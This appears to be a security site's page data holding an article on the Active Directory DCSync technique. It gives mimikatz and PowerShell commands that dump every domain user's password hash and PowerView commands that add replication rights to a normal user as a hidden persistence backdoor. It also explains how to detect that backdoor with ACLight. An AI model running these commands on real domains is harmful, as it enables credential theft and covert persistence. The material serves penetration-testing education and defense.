[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvmZpD-bCsDYERLPNjeM5hI5mpKRZu06wVY3NcGbBk3c":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":56,"createdAt":56,"_status":55},1281,"What is DCSync and what protocol does it use to replicate user credentials?","DCSync is a technique in mimikatz that uses the Directory Replication Service (DRS) protocol to replicate user credentials from a domain controller. It calls IDL_DRSGetNCChanges to export password hashes of all domain users, enabling attackers to escalate privileges or move laterally.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\n- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)","\u003Cp>DCSync is a technique in mimikatz that uses the Directory Replication Service (DRS) protocol to replicate user credentials from a domain controller. It calls IDL_DRSGetNCChanges to export password hashes of all domain users, enabling attackers to escalate privileges or move laterally.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\u003Cbr>- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-dcsync-and-what-protocol-does-it-use-to-replicate-user-credentials-1777477615358","DCSync, mimikatz, DRS protocol, IDL_DRSGetNCChanges",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":20,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":52,"updatedAt":53,"createdAt":54,"_status":55},299,"Domain Penetration - DCSync","domain-penetration-dcsync","Learn DCSync techniques for domain penetration: export user hashes, maintain persistence, and detect backdoors with open-source tools and methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>DCSync is a frequently used technique in domain penetration. This article will compile open-source materials, combine personal experience, and summarize methods for exploitation, defense, and detection.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Method to export all domain user hashes using DCSync\u003C\u002Fli>\u003Cli>Method to maintain persistence within the domain using DCSync\u003C\u002Fli>\u003Cli>Automated detection methods for DCSync backdoors\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Method to export all domain user hashes using DCSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>DCSync is a feature added to mimikatz in 2015, co-authored by Benjamin DELPY gentilkiwi and Vincent LE TOUX, capable of exporting hashes of all users within the domain.\u003C\u002Fp>\u003Cp>\u003Cstrong>Prerequisites:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain permissions for any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users in the Administrators group\u003C\u002Fli>\u003Cli>Users in the Domain Admins group\u003C\u002Fli>\u003Cli>Users in the Enterprise Admins group\u003C\u002Fli>\u003Cli>Computer account of the domain controller\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Exploitation principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Utilize the DRS (Directory Replication Service) protocol to replicate user credentials from the domain controller via IDL_DRSGetNCChanges\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-drsr\u002Ff977faaa-673e-4f66-b9bf-48c640241d47\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimikatz\u002Fmodules\u002Flsadump\u002Fkuhl_m_lsadump_dc.c#L27\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ch4>1. Use mimikatz\u003C\u002Fh4>\u003Cp>Export hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. PowerShell Implementation\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgist.github.com\u002Fmonoxgas\u002F9d238accd969550136db\u003C\u002Fp>\u003Cp>Calling the dcsync function in mimikatz.dll via Invoke-ReflectivePEinjection\u003C\u002Fp>\u003Cp>Export hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-DCSync -DumpForest | ft -wrap -autosize\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export the hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-DCSync -DumpForest -Users @(\"administrator\") | ft -wrap -autosize\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After obtaining the hashes of domain users, further exploitation can refer to previous articles:\u003C\u002Fp>\u003Cp>\"Domain Penetration - Implementation of Pass The Hash\"\u003C\u002Fp>\u003Cp>\"Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin mode)\"\u003C\u002Fp>\u003Cp>\"Domain Penetration - Pass The Hash &amp; Pass The Key\"\u003C\u002Fp>\u003Ch2>0x03 Methods for Maintaining Domain Privileges Using DCSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Conditions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain the permissions of any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users within the Domain Admins group\u003C\u002Fli>\u003Cli>Users within the Enterprise Admins group\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Exploitation Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add the following three ACEs (Access Control Entries) to a regular user in the domain:\u003C\u002Fp>\u003Cul>\u003Cli>DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)\u003C\u002Fli>\u003Cli>DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)\u003C\u002Fli>\u003Cli>DS-Replication-Get-Changes (GUID: 89e95b76-444d-4c62-991a-0facbeda640c)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>This user will then gain the permission to export all user hashes in the domain using DCSync\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation Code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1#L8270\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to add ACEs is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Supplement:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Command to remove ACE:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For more information on ACLs, refer to the previous article: 'Penetration Techniques – Access Control List in Windows'\u003C\u002Fp>\u003Cp>The method to invoke DCSync using domain user test1 is as follows:\u003C\u002Fp>\u003Ch4>1. On a domain-joined host logged in as user test1, directly use the DCSync feature of mimikatz\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Use runas to log in as user test1, then perform DCSync\u003C\u002Fh4>\u003Cp>(1) Pop up a cmd window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo 123456789 | runas \u002Fnoprofile \u002Fuser:test\\test1 cmd\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the following command in the popped-up cmd window:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Execute without popping up a window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo 123456789 | runas \u002Fnoprofile \u002Fuser:test\\test1 c:\\test\\1.bat\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The content of 1.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\test\\mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit&gt;c:\\test\\1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Similar tools include lsrunas, lsrunase, and CPAU\u003C\u002Fp>\u003Ch4>3. Using PowerShell to log in as user test1, then performing DCSync\u003C\u002Fh4>\u003Cp>(1) Launch cmd\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$uname=\"test\\test1\"\u003Cbr>$pwd=ConvertTo-SecureString \"12345678\" -AsPlainText –Force\u003Cbr>$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)\u003Cbr>Start-Process -FilePath \"cmd.exe\" -Credential $cred\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the following command in the launched cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Implement without pop-up window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$uname=\"test\\test1\"\u003Cbr>$pwd=ConvertTo-SecureString \"12345678\" -AsPlainText –Force\u003Cbr>$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)        \u003Cbr>Start-Process -FilePath \"c:\\test\\1.bat\" -Credential $cred\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The content of 1.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\test\\mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit&gt;c:\\test\\1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using wmic to log in as user test1 on the local machine will fail with the following error:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ERROR:\u003Cbr>Description = User credentials cannot be used for local connections\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Automated Detection Method for DCSync Backdoors\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Users with high privileges but not in high-privilege groups are referred to as Shadow Admins, such as the domain user test1 in 0x03. Simply querying members of high-privilege groups cannot reveal Shadow Admins within the domain.\u003C\u002Fp>\u003Cp>\u003Cstrong>Detection Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Enumerate the ACLs of all users in Active Directory and flag privileged accounts.\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation Code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fcyberark\u002FACLight\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Conditions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Powershell v3.0\u003C\u002Fli>\u003Cli>Domain User Privileges\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Detection Method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Execute Execute-ACLight2.bat from the project\u003C\u002Fp>\u003Cp>Three files will be generated:\u003C\u002Fp>\u003Cul>\u003Cli>Privileged Accounts - Layers Analysis.txt\u003C\u002Fli>\u003Cli>Privileged Accounts Permissions - Final Report.csv\u003C\u002Fli>\u003Cli>Privileged Accounts Permissions - Irregular Accounts.csv\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The files will display all privileged accounts\u003C\u002Fp>\u003Cp>Testing shows that ACLight can detect user test1 with DCSync permissions added\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation of DCSync in domain penetration and automated detection methods. From a defensive perspective, it is recommended to use ACLight to detect user ACLs in the domain environment\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",4,"published","2026-02-02T07:25:19.682Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"DCSync Domain Penetration: Export Hashes & Persistence","DCSync, domain penetration, hash export, persistence, detection, mimikatz, PowerShell",false,[],{"docs":41,"hasNextPage":51},[42,43,44,45,46,47,48,49,4,50],1289,1288,1287,1286,1285,1284,1283,1282,1280,true,{"title":30,"description":30,"image":30},"2026-07-24T02:07:12.184Z","2026-07-23T16:02:42.706Z","draft","2026-07-23T16:17:51.865Z"]